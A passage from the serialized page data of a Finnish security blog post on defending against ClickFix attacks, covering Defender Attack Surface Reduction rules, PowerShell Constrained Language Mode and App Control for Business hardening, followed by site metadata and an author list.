tarkistettavaksi sen jälkeen kun se on purettu tai deobfuskoitu muistissa, mutta ennen kuin se suoritetaan. PowerShell käyttää AMSI:a haittakoodin tunnistamiseen, ja AMSI tarvitsee reaaliaikaisen suojauksen ja Behavior Monitoringin.",[534,886,887],{},"Vähintään viisi Attack Surface Reduction -sääntöä on ClickFixin kannalta relevanttia:",[568,889,891],{"style":890},"margin: 0.5rem 0 2rem; overflow-x: auto",[892,893,807,895,807,914],"table",{"style":894},"width:100%; border-collapse: collapse; font-size: 0.85rem",[896,897,898,899,807],"thead",{},"\n    ",[900,901,902,903,902,908,902,911,898],"tr",{},"\n      ",[904,905,907],"th",{"style":906},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Sääntö",[904,909,910],{"style":906},"GUID",[904,912,913],{"style":906},"ClickFix-relevanssi",[915,916,898,917,898,933,898,948,898,961,898,974,807],"tbody",{},[900,918,902,919,902,924,902,930,898],{},[920,921,923],"td",{"style":922},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Estä mahdollisesti obfuskoitujen skriptien suoritus",[920,925,927],{"style":926},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa; white-space: nowrap",[551,928,929],{},"5beb7efe-fd9a-4556-801d-275e5ffc04cc",[920,931,932],{"style":922},"Obfuskoidut tai koodatut skriptit suoritus- ja evaasiovaiheessa",[900,934,902,935,902,939,902,945,898],{},[920,936,938],{"style":937},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Estä JavaScriptiä tai VBScriptiä käynnistämästä ladattua suoritettavaa sisältöä",[920,940,942],{"style":941},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff; white-space: nowrap",[551,943,944],{},"d3e037e1-3eb8-44c8-a917-57927947596d",[920,946,947],{"style":937},"WSH, .js tai .vbs, jotka käynnistävät ladattuja payloadeja",[900,949,902,950,902,953,902,958,898],{},[920,951,952],{"style":922},"Salli suoritettavat tiedostot vain prevalenssi-, ikä- tai trusted-list-kriteerin perusteella",[920,954,955],{"style":926},[551,956,957],{},"01443614-cd74-433a-b99e-2ecdc07bfc25",[920,959,960],{"style":922},"Tuoreet tai harvinaiset levylle kirjoitetut executablet",[900,962,902,963,902,966,902,971,898],{},[920,964,965],{"style":937},"Estä suoritettava sisältö sähköpostiohjelmasta ja webmailista",[920,967,968],{"style":941},[551,969,970],{},"be9ba2d9-53ea-4cdc-84e5-9b1eeee46550",[920,972,973],{"style":937},"Sähköpostilla toimitetut ClickFix-variantit",[900,975,902,976,902,979,902,984,898],{},[920,977,978],{"style":922},"Estä kaikkia Office-sovelluksia luomasta lapsiprosesseja",[920,980,981],{"style":926},[551,982,983],{},"d4f940ab-401b-4efc-aadc-ad5f3c50688a",[920,985,986],{"style":922},"Office-houkutinvariantit, jotka käynnistävät interpretereitä",[534,988,989],{},"Rullatkaa ASR ensin audit-tilassa, sitten pilottina, sitten block-tilassa. Tamper Protection on viimeinen linja: se estää hyökkääjää sammuttamasta teidän tunnistuksianne.",[534,991,992],{},"PowerShellissä itsessään vähennätte legacy-interpretereiden tuomaa riskiä. Identifioikaa ja poistakaa siellä missä se on toteutettavissa Windows PowerShell 2.0 ja legacy-VBScript-komponentit, joilta puuttuvat uudempien versioiden logging- ja security-ominaisuudet. Seuraava askel on Constrained Language Mode (CLM), joka rajoittaa PowerShellin käytettävissä olevia kielielementtejä ja estää monet skriptipohjaiset tekniikat. CLM:llä on robustia turva-arvoa vain silloin, kun system application control -policy pakottaa sen (App Control for Business); ympäristömuuttujan ja AppLockerin kautta toteutetut variantit ovat heikompia ja kierrettävissä. Ja monet järjestelmät tarvitsevat Full Language Modea toimiakseen, esimerkiksi ohjelmistojen deployment-tooling, minkä vuoksi CLM on usein toteutettavissa vain valituissa ympäristöissä.",[534,994,995],{},"Näin päädymme App Control for Businessiin (aiemmin WDAC). App Control pakottaa koodin integriteettipolicyn siitä, mitkä executablet, skriptit ja ajurit saavat ajaa. Strateginen asento on default-deny plus Microsoftin suosittelemat Block Rules, tunnettu LOLBin- ja bypass-estolista. App Control on myös oikea enforcement-polku PowerShellin CLM:lle. Script Enforcement estää MSHTA- ja MSXML-skriptihostit, pakottaa PowerShellin CLM:ään ja estää sallimattoman Windows Script Hostin käytön. Pari käyttäytymisfaktaa on tärkeää:",[804,997,807,998,807,1001,807,1004],{"style":806},[809,999,1000],{},"Base Policyt, jotka luottavat Windowsiin, eivät estä luotettuja LOLBineja automaattisesti. Teidän täytyy mergetä Microsoftin suosittelemat Block Rules sisään, jotta tunnetut bypassit sulkeutuvat.",[809,1002,1003],{},"App Control ei estä allekirjoitetun powershell.exen tai cmd.exen käynnistymistä. Se rajoittaa sitä, mitä ne saavat tehdä (CLM, ei allekirjoittamatonta tai sallimatonta payloadia), eikä säätele cmd.exen, .batin tai .cmd:n sisältöä. Siksi se kerrostetaan ASR:n ja käynnistyksen kovennuksen kanssa, eikä käytetä yksinään.",[809,1005,1006],{},"Audit-tila ei ole neutraali: Script Enforcement estää auditissakin MSHTA:n ja MSXML:n suorituksen ja voi muuttaa PowerShellin CLM-käyttäytymistä. Siksi App Controlin täytyy auditissa olla ensimmäisestä käyttöönotosta lähtien pilotti- tai rengasrajattu, ei koskaan koko laitekannan laajuinen.",[534,1008,1009],{},"App Control on yksittäinen kontrolli, jolla on korkein confidence interpreter-, LOLBin- ja payloadin suoritusvaiheita vastaan, ja se pakottaa robustin CLM:n. Samalla se kantaa korkeimman deployment-kompleksisuuden ja korkeimman rollback-riskin, sillä virheellinen konfiguraatio estää suorituksen. Ottakaa se käyttöön hallittujen pilottirenkaiden kautta.",[529,1011,1013],{"id":1012},"missä-me-tulemme-kuvaan","Missä me tulemme kuvaan",[534,1015,536],{},[534,1017,1018,1019,784],{},"ClickFix on nopea, ja Microsoftin natiivit tunnistukset kattavat suurimman osan, mutta eivät kaikkea. CSOC-asiakkaillemme laajennamme kattavuutta jatkuvasti siellä, missä aukkoja ilmaantuu: suoritus Windows Terminalin kautta, RAT-vetoiset tuki-scamit ja post-compromise-käyttäytyminen. Jos haluatte tietää, missä teidän ympäristönne on, ",[1020,1021,1022],"a",{"href":276},"ottakaa yhteyttä",[1024,1025,1026],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":577,"searchDepth":677,"depth":677,"links":1028},[1029,1030,1031,1032,1033,1034,1035,1036,1037],{"id":531,"depth":677,"text":532},{"id":615,"depth":677,"text":616},{"id":627,"depth":677,"text":628},{"id":650,"depth":677,"text":651},{"id":763,"depth":677,"text":764},{"id":793,"depth":677,"text":794},{"id":830,"depth":677,"text":831},{"id":846,"depth":677,"text":847},{"id":1012,"depth":677,"text":1013},"md","post",{"lang":1041,"seoTitle":1042,"titleClass":1043,"date":1044,"categories":1045,"blogtitlepic":1047,"socialimg":1048,"customExcerpt":1049,"keywords":1050,"asideNav":1051,"published":325},"fi","ClickFix-hyökkäysten tunnistaminen ja estäminen: Win+R-liitostemppu","h2-font-size","2026-09-21",[1046],"Security","head-clickfix.jpg","/blog/heads/head-clickfix.jpg","ClickFix tekee käyttäjästä oman hyökkääjänsä: väärennetty CAPTCHA, yksi copy-paste, ja haittakoodi ajaa muistissa ilman että mitään päätyy levylle. Miten Microsoft Defender tunnistaa hyökkäyksen, missä tunnistus tulee rajoilleen ja miten te suljette aukon RunMRU-huntilla ja neljällä suojauslayerilla.","ClickFix, ClickFix-hyökkäys, ClickFix-tunnistus, ClickFixin estäminen, Fake CAPTCHA, Win+R-hyökkäys, RunMRU KQL, Microsoft Defender, Attack Surface Reduction, ASR-säännöt, App Control for Business, WDAC, Constrained Language Mode, Network Protection, AMSI, Endpoint Privilege Management, Infostealer, LOLBin, PowerShell-kovennus",{"menuItems":1052},[1053,1056,1059,1062,1065,1068,1071,1074,1077],{"href":1054,"text":1055},"#clickfix-hyökkäysketju","Hyökkäysketju",{"href":1057,"text":1058},"#mitä-microsoft-defender-havaitsee","Mitä Defender havaitsee",{"href":1060,"text":1061},"#missä-natiivi-tunnistus-tulee-rajoilleen","Missä se takkuaa",{"href":1063,"text":1064},"#aukon-sulkeminen-runmru-hunt","Aukon sulkeminen",{"href":1066,"text":1067},"#suojauslayer-1-toimituksen-estäminen","Layer 1: toimitus",{"href":1069,"text":1070},"#suojauslayer-2-tempun-estäminen","Layer 2: temppu",{"href":1072,"text":1073},"#suojauslayer-3-toiminnon-estäminen","Layer 3: toiminto",{"href":1075,"text":1076},"#suojauslayer-4-suorituksen-estäminen","Layer 4: suoritus",{"href":1078,"text":1013},"#missä-me-tulemme-kuvaan","/posts/2026-09-21-clickfix-prevent-detect",{"title":521,"description":577},"posts/2026-09-21-clickfix-prevent-detect",[1083,1084,1085],"Defender","SOC","Endpoint Security","ITRWHdeMy3Yxx9BYvNEm0ljNIgCJKT0IQ0THS5tBZRg",{"id":1088,"extension":1089,"meta":1090,"stem":8,"__hash__":1439},"authors_data/authors.json","json",{"path":1091,"Fritz Zurhorst":1092,"Alexander Schlindwein":1097,"Sophie Luna":1103,"Nadine Klein":1111,"Karsten Kleinschmidt":1116,"Julian Wendt":1124,"Holger Bunkradt":1129,"Ralf Mania":1135,"Oliver Kieselbach":1141,"Steffen Schwerdtfeger":1147,"Gunnar Winter":1155,"Jan Petersen":1160,"Thorsten Kunzi":1165,"Moritz Pohl":1169,"Thorben Pöschus":1174,"Christoph Hannebauer":1180,"Marco Scheel":1184,"Christopher Brumm":1189,"Florian Klante":1196,"Niklas Bachmann":1201,"Nils Krautkrämer":1206,"Patrick Treptau":1212,"Peter Beckendorf":1217,"Patrick Sobau":1222,"Jörg Wunderlich":1227,"Michael Breither":1231,"Christian Kanja":1236,"Zeba Hoffmann":1242,"Jochen Fröhlich":1247,"Jan Geisbauer":1251,"Gerrit Reinke":1263,"Christian Kordel":1269,"Stephan Wälde":1273,"Carolin Kanja":1278,"Adrian Ritter":1284,"Marvin Bangert":1289,"Thorsten Pickhan":1295,"Christian Lorenz":1301,"Denis Böhm":1306,"Fabian Bader":1311,"Juan Jose Fernandez Perez":1317,"Mahschid Sayyar":1322,"Benjamin Dassow":1327,"Markus Walschburger":1332,"Jonathan Haist":1337,"Daniel Rohregger":1342,"Thomas Naunheim":1347,"Florian Stöckl":1352,"Pascal Asch":1357,"Markus Kättner":1362,"Anna Ulbricht":1369,"Annette Brauns":1376,"body":1382,"title":1438},"/authors",{"display_name":523,"avatar":1093,"permalink":1094,"linkedin":1095,"imageOffsetTop":1096},"people/people-fritz-zurhorst.png","/authors/fritz-zurhorst","friedemann-z","72%",{"display_name":1098,"avatar":1099,"permalink":1100,"twitter":1101,"linkedin":1102},"Alexander Schlindwein","people/people-alexander-rudolph.png","/authors/alexander-schlindwein","AlexanderOnIT","schlindwein-alexander",{"display_name":1104,"avatar":1105,"permalink":1106,"twitter":1107,"linkedin":1108,"imageOffsetLeft":1109,"imageOffsetTop":1110},"Sophie Luna","people/people-sophie-luna.jpg","/authors/sophie-luna","glueckkanjagab","../company/glueckkanja-gab","58%","67%",{"display_name":524,"avatar":1112,"permalink":1113,"twitter":1114,"linkedin":1115,"imageOffsetTop":1096},"people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern",{"display_name":1117,"avatar":1118,"permalink":1119,"twitter":1120,"linkedin":1121,"imageOffsetTop":1122,"imageOffsetLeft":1123},"Karsten Kleinschmidt","/c_pad,w_800,h_700/people/karsten-kleinschmidt.jpg","/authors/karsten-kleinschmidt","KarstenonIT","karstenkleinschmidt","60%","57%",{"display_name":1125,"avatar":1126,"permalink":1127,"linkedin":1128},"Julian Wendt","people/people-julian-wendt.png","/authors/julian-wendt","julian-wendt",{"display_name":1130,"avatar":1131,"permalink":1132,"linkedin":1133,"twitter":1134},"Holger Bunkradt","people/people-holger-bunkradt.png","/authors/holger-bunkradt","holger-bunkradt-12b5053b","hbunkradt",{"display_name":1136,"avatar":1137,"permalink":1138,"linkedin":1139,"twitter":1140},"Ralf Mania","people/people-ralf-mania.png","/authors/ralf-mania","ralf-mania-146a2757","RaMa1976",{"display_name":1142,"avatar":1143,"permalink":1144,"linkedin":1145,"twitter":1146},"Oliver Kieselbach","people/people-oliver-kieselbach.png","/authors/oliver-kieselbach","oliver-kieselbach-a4a3409","okieselbT",{"display_name":1148,"avatar":1149,"permalink":1150,"linkedin":1151,"twitter":1152,"imageOffsetTop":1153,"imageOffsetLeft":1154},"Steffen Schwerdtfeger","people/people-steffen-schwerdtfeger.png","/authors/steffen-schwerdtfeger","steffen-schwerdtfeger","SteffenAtCloud","79%","51%",{"display_name":1156,"avatar":1157,"permalink":1158,"twitter":1107,"linkedin":1159},"Gunnar Winter","people/people-gunnar-winter.jpg","/authors/gunnar-winter","company/glueckkanja-gab",{"display_name":1161,"avatar":1162,"permalink":1163,"twitter":1107,"linkedin":1164},"Jan Petersen","people/jan-petersen.png","/authors/jan-petersen","jan-petersen-26a901",{"display_name":1166,"avatar":1167,"permalink":1168,"twitter":1107,"linkedin":1159,"imageOffsetTop":1096},"Thorsten Kunzi","people/author-thorsten-kunzi.png","/authors/thorsten-kunzi",{"display_name":1170,"avatar":1171,"permalink":1172,"twitter":1107,"linkedin":1173},"Dr. Moritz Pohl","people/people-moritz-pohl.png","/authors/moritz-pohl","dr-moritz-pohl",{"display_name":1175,"avatar":1176,"permalink":1177,"twitter":1178,"linkedin":1179},"Thorben Pöschus","people/thorben.poeschus.png","/authors/thorben-poeschus","TPO901","thorben-pöschus-624693b7",{"display_name":1181,"avatar":1182,"permalink":1183,"twitter":1107,"linkedin":1159,"imageOffsetTop":1096},"Dr. Christoph Hannebauer","people/people-christoph-hannebauer.png","/authors/christoph-hannebauer",{"display_name":1185,"avatar":1186,"permalink":1187,"twitter":1188,"linkedin":1188},"Marco Scheel","people/people-marco-scheel.png","/authors/marco-scheel","marcoscheel",{"display_name":1190,"avatar":1191,"permalink":1192,"twitter":1193,"linkedin":1194,"imageOffsetTop":1195},"Christopher Brumm","people/people-christopher-brumm.jpg","/authors/christopher-brumm","cbrhh","christopherbrumm","66%",{"display_name":1197,"avatar":1198,"permalink":1199,"linkedin":1200,"twitter":1107},"Florian Klante","people/florian-klante.jpg","/authors/florian-klante","florian-klante-6031b31b",{"display_name":1202,"avatar":1203,"permalink":1204,"linkedin":1205,"twitter":1107},"Niklas Bachmann","people/niklas.bachmann.png","/authors/niklas-bachmann","niklas-bachmann-66a863158",{"display_name":1207,"avatar":1208,"permalink":1209,"twitter":1210,"linkedin":1211},"Nils Krautkrämer","people/nils-krautkraemer.png","/authors/nils-krautkraemer","KrauNils","nils-krautkrämer-8b04bb250",{"display_name":1213,"avatar":1214,"permalink":1215,"linkedin":1216,"twitter":1107},"Patrick Treptau","people/people-patrick-treptau.png","/authors/patrick-traptau","ptreptau",{"display_name":1218,"avatar":1219,"permalink":1220,"linkedin":1221,"twitter":1107,"imageOffsetTop":1096},"Peter Beckendorf","people/peter-beckendorf.png","/authors/peter-beckendorf","peter-beckendorf-29a239b1",{"display_name":1223,"avatar":1224,"permalink":1225,"linkedin":1226,"twitter":1107},"Patrick Sobau","people/patrick-sobau.png","/authors/patrick-sobau","patrick-sobau",{"display_name":1228,"avatar":1229,"permalink":1230,"twitter":1107},"Jörg Wunderlich","people/joerg-wunderlich.png","/authors/joerg-wunderlich",{"display_name":1232,"avatar":1233,"permalink":1234,"twitter":1107,"linkedin":1235},"Michael Breither","people/people-michael-breither.jpg","/authors/michael-breither","michaelbreither",{"display_name":1237,"avatar":1238,"permalink":1239,"twitter":1240,"linkedin":1241},"Christian Kanja","people/people-christian-kanja.png","/authors/christian-kanja","cekageka","christian-kanja",{"display_name":1243,"avatar":1244,"permalink":1245,"linkedin":1246,"twitter":1107},"Zeba Hoffmann","people/zeba-hoffmann.png","/authors/zeba-hoffmann","zebahoffmann",{"display_name":1248,"avatar":1249,"permalink":1250,"twitter":1107,"linkedin":1159},"Jochen Fröhlich","people/people-jochen-froehlich.png","/authors/jochen-froehlich",{"display_name":1252,"avatar":1253,"permalink":1254,"twitter":1255,"linkedin":1255,"imageOffsetTop":1096,"socials":1256},"Jan Geisbauer","people/people-jan-geisbauer-csoc.png","/authors/jan-geisbauer","JanGeisbauer",[1257,1260],{"text":1258,"href":1259},"Blog","https://emptydc.com",{"text":1261,"href":1262},"Podcast","https://hairlessinthecloud.com",{"display_name":1264,"avatar":1265,"permalink":1266,"twitter":1267,"linkedin":1268},"Gerrit Reinke","people/gerrit-reinke.png","/authors/gerrit-reinke","GLWRe","glwr",{"display_name":1270,"avatar":1271,"permalink":1272,"twitter":1107,"linkedin":1159},"Christian Kordel","people/christian-kordel.png","/authors/christian-kordel",{"display_name":1274,"avatar":1275,"permalink":1276,"twitter":1277,"linkedin":1159},"Stephan Wälde","people/people-stephan-waelde.png","/authors/stephan-waelde","stephanwaelde",{"display_name":1279,"avatar":1280,"permalink":1281,"twitter":1282,"linkedin":1283},"Carolin Kanja","people/people-carolin-kanja.jpg","/authors/carolin-kanja","fraukanja","carolin-kanja",{"display_name":1285,"avatar":1286,"permalink":1287,"twitter":1288,"linkedin":1288},"Adrian Ritter","people/people-adrian-ritter.png","/authors/adrian-ritter","adrianritter",{"display_name":1290,"avatar":1291,"permalink":1292,"twitter":1293,"linkedin":1294},"Marvin Bangert","people/people-marvin-bangert.png","/authors/marvin-bangert","marvinbangert","marvin-bangert",{"display_name":1296,"avatar":1297,"permalink":1298,"twitter":1299,"linkedin":1300},"Thorsten Pickhan","people/people-thorsten-pickhan.png","/authors/thorsten-pickhan","tpickhan","thorsten-pickhan",{"display_name":1302,"avatar":1303,"permalink":1304,"linkedin":1305,"twitter":1107},"Christian Lorenz","people/people-christian-lorenz.png","/authors/christian-lorenz","christianlorenz95",{"display_name":1307,"avatar":1308,"permalink":1309,"linkedin":1310,"twitter":1107},"Denis Böhm","people/people-denis-boehm.png","/authors/denis-boehm","denis-böhm-3bb834135",{"display_name":1312,"avatar":1313,"permalink":1314,"linkedin":1315,"twitter":1316},"Fabian Bader","people/people-fabian-bader.jpg","/authors/fabian-bader","fabianbader","fabian_bader",{"display_name":1318,"avatar":1319,"permalink":1320,"linkedin":1321},"Juan Jose Fernandez Perez","people/people-juan-jose-fernandez.jpg","/authors/juan-jose-fernandez-perez","juan-jose-fernandez-perez-8016055",{"display_name":1323,"avatar":1324,"permalink":1325,"linkedin":1326},"Mahschid Sayyar","people/people-mahschid-sayyar.jpg","/authors/mahschid-sayyar","mahschid-sayyar-97544463",{"display_name":1328,"avatar":1329,"permalink":1330,"linkedin":1331},"Benjamin Dassow","people/people-benjamin-dassow.jpg","/authors/benjamin-dassow","benjamin-dassow",{"display_name":1333,"avatar":1334,"permalink":1335,"linkedin":1336},"Markus Walschburger","people/people-markus-walschburger.jpg","/authors/markus-walschburger","markus-walschburger",{"display_name":1338,"avatar":1339,"permalink":1340,"linkedin":1341,"imageOffsetTop":1096},"Jonathan Haist","people/people-jonathan-haist.jpg","/authors/jonathan-haist","jonathanhaist",{"display_name":1343,"avatar":1344,"permalink":1345,"linkedin":1346,"imageOffsetTop":1096},"Daniel Rohregger","people/people-daniel-rohregger.jpg","/authors/daniel-rohregger","drohregger",{"display_name":1348,"avatar":1349,"permalink":1350,"linkedin":1351,"imageOffsetTop":1195},"Thomas Naunheim","people/people-thomas-naunheim.jpg","/authors/thomas-naunheim","thomasnaunheim",{"display_name":1353,"avatar":1354,"permalink":1355,"linkedin":1356,"imageOffsetTop":1195},"Florian Stöckl","people/people-florian-stoeckl.jpg","/authors/florian-stoeckl","florianstoeckl",{"display_name":1358,"avatar":1359,"permalink":1360,"linkedin":1361,"imageOffsetTop":1195},"Pascal Asch","people/Pascal.Asch.648.jpg","/authors/pascal-asch","pascal-asch",{"display_name":1363,"avatar":1364,"permalink":1365,"linkedin":1366,"imageOffsetTop":1367,"imageOffsetLeft":1368},"Markus Kättner","people/markus-kaettner.jpg","/authors/markus-kaettner","markus-kättner-b600119","62%","63%",{"display_name":1370,"avatar":1371,"permalink":1372,"linkedin":1373,"imageOffsetTop":1374,"imageOffsetLeft":1375},"Anna Ulbricht","people/anna-katharina.ulbricht-09.png","/authors/anna-ulbricht","anna-katharina-u-a67702199","70%","50%",{"display_name":1377,"avatar":1378,"permalink":1379,"linkedin":1380,"imageOffsetTop":1381,"imageOffsetLeft":1122},"Annette Brauns","people/Annette-Brauns-8.jpg","/authors/annette-brauns","annette-brauns","95%",{"Fritz Zurhorst":1383,"Alexander Schlindwein":1384,"Sophie Luna":1385,"Nadine Klein":1386,"Karsten Kleinschmidt":1387,"Julian Wendt":1388,"Holger Bunkradt":1389,"Ralf Mania":1390,"Oliver Kieselbach":1391,"Steffen Schwerdtfeger":1392,"Gunnar Winter":1393,"Jan Petersen":1394,"Thorsten Kunzi":1395,"Moritz Pohl":1396,"Thorben Pöschus":1397,"Christoph Hannebauer":1398,"Marco Scheel":1399,"Christopher Brumm":1400,"Florian Klante":1401,"Niklas Bachmann":1402,"Nils Krautkrämer":1403,"Patrick Treptau":1404,"Peter Beckendorf":1405,"Patrick Sobau":1406,"Jörg Wunderlich":1407,"Michael Breither":1408,"Christian Kanja":1409,"Zeba Hoffmann":1410,"Jochen Fröhlich":1411,"Jan Geisbauer":1412,"Gerrit Reinke":1416,"Christian Kordel":1417,"Stephan Wälde":1418,"Carolin Kanja":1419,"Adrian Ritter":1420,"Marvin Bangert":1421,"Thorsten Pickhan":1422,"Christian Lorenz":1423,"Denis Böhm":1424,"Fabian Bader":1425,"Juan Jose Fernandez Perez":1426,"Mahschid Sayyar":1427,"Benjamin Dassow":1428,"Markus Walschburger":1429,"Jonathan Haist":1430,"Daniel Rohregger":1431,"Thomas Naunheim":1432,"Florian Stöckl":1433,"Pascal Asch":1434,"Markus Kättner":1435,"Anna Ulbricht":1436,"Annette Brauns":1437},{"display_name":523,"avatar":1093,"permalink":1094,"linkedin":1095,"imageOffsetTop":1096},{"display_name":1098,"avatar":1099,"permalink":1100,"twitter":1101,"linkedin":1102},{"display_name":1104,"avatar":1105,"permalink":1106,"twitter":1107,"linkedin":1108,"imageOffsetLeft":1109,"imageOffsetTop":1110},{"display_name":524,"avatar":1112,"permalink":1113,"twitter":1114,"linkedin":1115,"imageOffsetTop":1096},{"display_name":1117,"avatar":1118,"permalink":1119,"twitter":1120,"linkedin":1121,"imageOffsetTop":1122,"imageOffsetLeft":1123},{"display_name":1125,"avatar":1126,"permalink":1127,"linkedin":1128},{"display_name":1130,"avatar":1131,"permalink":1132,"linkedin":1133,"twitter":1134},{"display_name":1136,"avatar":1137,"permalink":1138,"linkedin":1139,"twitter":1140},{"display_name":1142,"avatar":1143,"permalink":1144,"linkedin":1145,"twitter":1146},{"display_name":1148,"avatar":1149,"permalink":1150,"linkedin":1151,"twitter":1152,"imageOffsetTop":1153,"imageOffsetLeft":1154},{"display_name":1156,"avatar":1157,"permalink":1158,"twitter":1107,"linkedin":1159},{"display_name":1161,"avatar":1162,"permalink":1163,"twitter":1107,"linkedin":1164},{"display_name":1166,"avatar":1167,"permalink":1168,"twitter":1107,"linkedin":1159,"imageOffsetTop":1096},{"display_name":1170,"avatar":1171,"permalink":1172,"twitter":1107,"linkedin":1173},{"display_name":1175,"avatar":1176,"permalink":1177,"twitter":1178,"linkedin":1179},{"display_name":1181,"avatar":1182,"permalink":1183,"twitter":1107,"linkedin":1159,"imageOffsetTop":1096},{"display_name":1185,"avatar":1186,"permalink":1187,"twitter":1188,"linkedin":1188},{"display_name":1190,"avatar":1191,"permalink":1192,"twitter":1193,"linkedin":1194,"imageOffsetTop":1195},{"display_name":1197,"avatar":1198,"permalink":1199,"linkedin":1200,"twitter":1107},{"display_name":1202,"avatar":1203,"permalink":1204,"linkedin":1205,"twitter":1107},{"display_name":1207,"avatar":1208,"permalink":1209,"twitter":1210,"linkedin":1211},{"display_name":1213,"avatar":1214,"permalink":1215,"linkedin":1216,"twitter":1107},{"display_name":1218,"avatar":1219,"permalink":1220,"linkedin":1221,"twitter":1107,"imageOffsetTop":1096},{"display_name":1223,"avatar":1224,"permalink":1225,"linkedin":1226,"twitter":1107},{"display_name":1228,"avatar":1229,"permalink":1230,"twitter":1107},{"display_name":1232,"avatar":1233,"permalink":1234,"twitter":1107,"linkedin":1235},{"display_name":1237,"avatar":1238,"permalink":1239,"twitter":1240,"linkedin":1241},{"display_name":1243,"avatar":1244,"permalink":1245,"linkedin":1246,"twitter":1107},{"display_name":1248,"avatar":1249,"permalink":1250,"twitter":1107,"linkedin":1159},{"display_name":1252,"avatar":1253,"permalink":1254,"twitter":1255,"linkedin":1255,"imageOffsetTop":1096,"socials":1413},[1414,1415],{"text":1258,"href":1259},{"text":1261,"href":1262},{"display_name":1264,"avatar":1265,"permalink":1266,"twitter":1267,"linkedin":1268},{"display_name":1270,"avatar":1271,"permalink":1272,"twitter":1107,"linkedin":1159},{"display_name":1274,"avatar":1275,"permalink":1276,"twitter":1277,"linkedin":1159},{"display_name":1279,"avatar":1280,"permalink":1281,"twitter":1282,"linkedin":1283},{"display_name":1285,"avatar":1286,"permalink":1287,"twitter":1288,"linkedin":1288},{"display_name":1290,"avatar":1291,"permalink":1292,"twitter":1293,"linkedin":1294},{"display_name":1296,"avatar":1297,"permalink":1298,"twitter":1299,"linkedin":1300},{"display_name":1302,"avatar":1303,"permalink":1304,"linkedin":1305,"twitter":1107},{"display_name":1307,"avatar":1308,"permalink":1309,"linkedin":1310,"twitter":1107},{"display_name":1312,"avatar":1313,"permalink":1314,"linkedin":1315,"twitter":1316},{"display_name":1318,"avatar":1319,"permalink":1320,"linkedin":1321},{"display_name":1323,"avatar":1324,"permalink":1325,"linkedin":1326},{"display_name":1328,"avatar":1329,"permalink":1330,"linkedin":1331},{"display_name":1333,"avatar":1334,"permalink":1335,"linkedin":1336},{"display_name":1338,"avatar":1339,"permalink":1340,"linkedin":1341,"imageOffsetTop":1096},{"display_name":1343,"avatar":1344,"permalink":1345,"linkedin":1346,"imageOffsetTop":1096},{"display_name":1348,"avatar":1349,"permalink":1350,"linkedin":1351,"imageOffsetTop":1195},{"display_name":1353,"avatar":1354,"permalink":1355,"linkedin":1356,"imageOffsetTop":1195},{"display_name":1358,"avatar":1359,"permalink":1360,"linkedin":1361,"imageOffsetTop":1195},{"display_name":1363,"avatar":1364,"permalink":1365,"linkedin":1366,"imageOffsetTop":1367,"imageOffsetLeft":1368},{"display_name":1370,"avatar":1371,"permalink":1372,"linkedin":1373,"imageOffsetTop":1374,"imageOffsetLeft":1375},{"display_name":1377,"avatar":1378,"permalink":1379,"linkedin":1380,"imageOffsetTop":1381,"imageOffsetLeft":1122},"Authors","1csawlkJxRljy93GTOnXEkwLqAv9Lcj-apxRvoodAOY",{"list":1441,"authors":1647},[1442,1458,1463,1477,1493,1506,1519,1532,1544,1560,1574,1589,1607,1618,1631],{"id":1443,"title":1444,"author":1445,"cta":494,"description":577,"hideInRecent":484,"layout":1039,"meta":1446,"moment":1450,"path":1451,"stem":1452,"tags":1453,"webcast":484},"content_fi/posts/2026-09-22-end-of-mfa-sms.md","MFA-tekstiviestin loppu",[1117],{"lang":1041,"date":1044,"categories":1447,"blogtitlepic":1448,"customExcerpt":1449},[1046],"head-conditional-access.jpg","Miksi yritysten kannattaa nyt siirtyä phishing-kestäviin ja mahdollisimman salasanattomiin kirjautumistapoihin.","2026-09-22","/posts/2026-09-22-end-of-mfa-sms","posts/2026-09-22-end-of-mfa-sms",[1046,1454,1455,1456,1457],"Authentication","Microsoft Entra ID","MFA","Passkeys",{"id":520,"title":521,"author":1459,"cta":494,"description":577,"hideInRecent":484,"layout":1039,"meta":1460,"moment":1044,"path":1079,"stem":1081,"tags":1462,"webcast":484},[523,524],{"lang":1041,"date":1044,"categories":1461,"blogtitlepic":1047,"customExcerpt":1049},[1046],[1083,1084,1085],{"id":1464,"title":1465,"author":1466,"cta":494,"description":577,"hideInRecent":484,"layout":1039,"meta":1467,"moment":1044,"path":1471,"stem":1472,"tags":1473,"webcast":484},"content_fi/posts/2026-09-21-red-tenant-dark-tenant-cio.md","Admin ja arki samalla koneella? Game Over.",[1252],{"lang":1041,"date":1044,"categories":1468,"blogtitlepic":1469,"customExcerpt":1470},[1046],"head-game-over-en.jpg","Miksi yksi tenant ei riitä CIO:lle, ja miksi toista harvoin ajatellaan mukaan. Managed Red Tenant erottaa hallinnollisen työn arkkitehtonisesti toimistoympäristöstä, Managed Dark Tenant pitää yrityksen toimintakykyisenä silloinkin, kun puolustus kaatuu. Mitä se tarkoittaa toimintamallille, SOC-signaalille ja NISG 2026:n näyttövelvollisuuksille.","/posts/2026-09-21-red-tenant-dark-tenant-cio","posts/2026-09-21-red-tenant-dark-tenant-cio",[1046,1474,1475,1476],"Privileged Access","Zero 